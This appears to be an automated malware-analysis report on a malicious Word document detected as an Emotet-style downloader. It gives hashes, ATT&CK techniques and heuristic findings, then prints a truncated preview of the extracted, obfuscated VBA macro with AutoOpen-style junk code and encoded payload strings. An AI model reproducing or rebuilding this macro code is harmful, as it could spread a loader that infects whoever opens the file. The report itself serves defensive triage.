Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ca92b5e83f35c42…

MALICIOUS

Office (OLE)

223.0 KB Created: 2018-04-04 22:57:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 84fcf866f98dec046ad9b69bef41c4af SHA-1: cb5a72f18b6989a4a8cc8fc8cb037e896bbed86c SHA-256: 1ca92b5e83f35c422df3f7e41223746d07c5ac9dd38555f449e1df01f61156a2
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro utilizes CreateObject and appears to be obfuscated, likely intended to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45443 bytes
SHA-256: d61007f03fdebe38d8a535b429604310cb54be9d569c6f1aa11f18b4ba82b569
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KzDGmMTGzwXQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jwwkZFiWOotXWO"
Function VtNHXaSRw()
On Error Resume Next
Select Case WNTvb
         Case 51069
            DGMjzQ = 51354
            pIIfUV = Sqr(96297)
         Case 18773
            iQjkAq = CSng(RzaIJk)
            ZUJqa = IHwsDi
End Select
hjScSB = zZNIR("R.1zXiIfneUtzaS8dTV6sxc9e9dDxfQZ17KP69wF5qrqM+U5cUN9L6k3NYwPnaObhYPk1cZ6e37cc9f7kRF1OP+vIy1FvqO++e3+RSh+O1JvEiR1VlpY", 3, 108)
Select Case NOsjYD
         Case 73042
            KrLCP = 68153
            ApSmE = Sqr(14465)
         Case 66450
            KfYiZ = CSng(UqhSLO)
            GrjGw = OcznKr
End Select
Select Case zvTRv
         Case 12183
            pHTwHD = 48315
            QjYhEa = Sqr(93128)
         Case 13042
            kvsGG = CSng(mXswro)
            mQNaX = KhKZLf
End Select
NPjtfG = zZNIR("C238yR5GPHdc57ivLl1c/84ii9S6YqDdGAmHYr3GFFnxXmG7x9q6kjqWsSr9sxzzpmF3ls51UUn/d8pL7vz3Ko84fux7n1/fMeD0Et//+Hir8/fmz+Ll7u39qfb4nP3Ury+3VRNeXHx09f740V6lS/S5SLNV4vrNPx1tUgvrxar8Gb0c.", 3, 171)
Select Case jMdPlD
         Case 78368
            hAOnj = 34186
            bOFhtL = Sqr(94403)
         Case 16107
            iCRwZ = CSng(VhaaI)
            tdNnzs = PznnN
End Select
Select Case kztNsm
         Case 26788
            GCPjzv = 91400
            bUvFh = Sqr(20266)
         Case 90788
            LSjmSK = CSng(CcUlaR)
            qGmwE = ijjiXL
End Select
URLGkEkG = zZNIR("w2/fP//z88y9vN2/t7d3LYzN8++Pu+4eLsOe3u6ouPla/vRUv7e+vtmeHPS+v3PN6/7m7KV7fXqpmuPu+vn27+fC3Dz9cXS6vs1/TNL28Wub/S5ZZvkzz/6aXySr5tsqXq3pYf3Jl4vppnbiycPd+vXabnav9unDlzn2d1l/dl86euftH77.UBmXa", 3, 177)
Select Case IczCa
         Case 4340
            BZFbcw = 25996
            HiKUB = Sqr(25727)
         Case 57303
            SkFISc = CSng(COHJja)
            SLYVMR = LUIYR
End Select
Select Case iMIRnO
         Case 72187
            JQcrVC = 73271
            ESkjo = Sqr(49978)
         Case 96177
            VQNPc = CSng(bELjTf)
            prXjG = lvRFV
End Select
ErkbiO = zZNIR("wV1GfcHO2vg2RMfqy/kC+p5VH2lqPtprvsR+5AfqCfUebDrQH/Nn53F50l1kDOf433KR8QJ+1N79ma3nQfegL056tBwYd48zPVo8QdvIZ+fke8T8761vCd+MS9O9mytPsyfgXW3tTxkHI883+xH3SfkLdYz91t9c/1WdjIfDIeIG+0Cf1m8lc/9wHyo53y0J3DekxctPwIj0vi", 3, 198)
Select Case GwGjw
         Case 19500
            OpwWA = 42413
            NpXjp = Sqr(68689)
         Case 11873
            PaNCi = CSng(MXDLr)
            VzUXPW = RVsVW
End Select
Select Case cwfvv
         Case 48080
            ZcXvi = 25252
            Tpcwzo = Sqr(84793)
         Case 87803
            PcSKh = CSng(lXuJVV)
            wbZXOF = mizpqS
End Select
IlWDSvjirU = zZNIR("@mzB4UuMIu4J7hd+DamV97xTsn7sSpEd6Ni3bZeeNcd+G8J8R7Yr1uFd8t6ll3VwG", 5, 57)
Select Case pfSORi
         Case 76990
            TdOUu = 83893
            BUrYbt = Sqr(2697)
         Case 44590
            amwVli = CSng(TOjvsb)
            DnEjHv = tLDmd
End Select
Select Case oXpTOh
         Case 73271
            bjDsa = 76323
            EwVTF = Sqr(89257)
         Case 25352
            IwWOC = CSng(iaSGYT)
            Njuzj = SAXPcA
End Select
JOqmUIvrNi = zZNIR("5RidkCFym86k7Yv572ku9Xs3xRB2TR3PpPfDi1kf+IW9FfYt+ZLw8qN4884Z9sledVOKTmnWCuJEiK7", 7, 70)
Select Case Qpwabh
         Case 52236
            hVsSj = 53210
            FklCUv = Sqr(81978)
         Case 30162
            UYPuCl = CSng(tNWRpb)
            irrojO = jwCWv
End Select
Select Case ilRlY
         Case 49052
            MsUJp = 10054
            EdKarE = Sqr(40162)
         Case 2422
            CMovY = CSng(IYWro)
            dmrrwd = ikwUr
End Select
MkwfwIM = zZNIR("4jINr3yBbwwGn79JHs987+BPZXZeeKTeGwdn73VF+wzfvSKS886Nr8ceaf29I88FfO1OvPiZPs7rXfy0/KVcSd/hc+oR8T9qHitDK/toPr0rPvaE3/wwAZ1Cb4E71u+K1+Z5zEf6vc8n6ivJMLtQTgnWGd1txE/c9+J9cx8
... (truncated)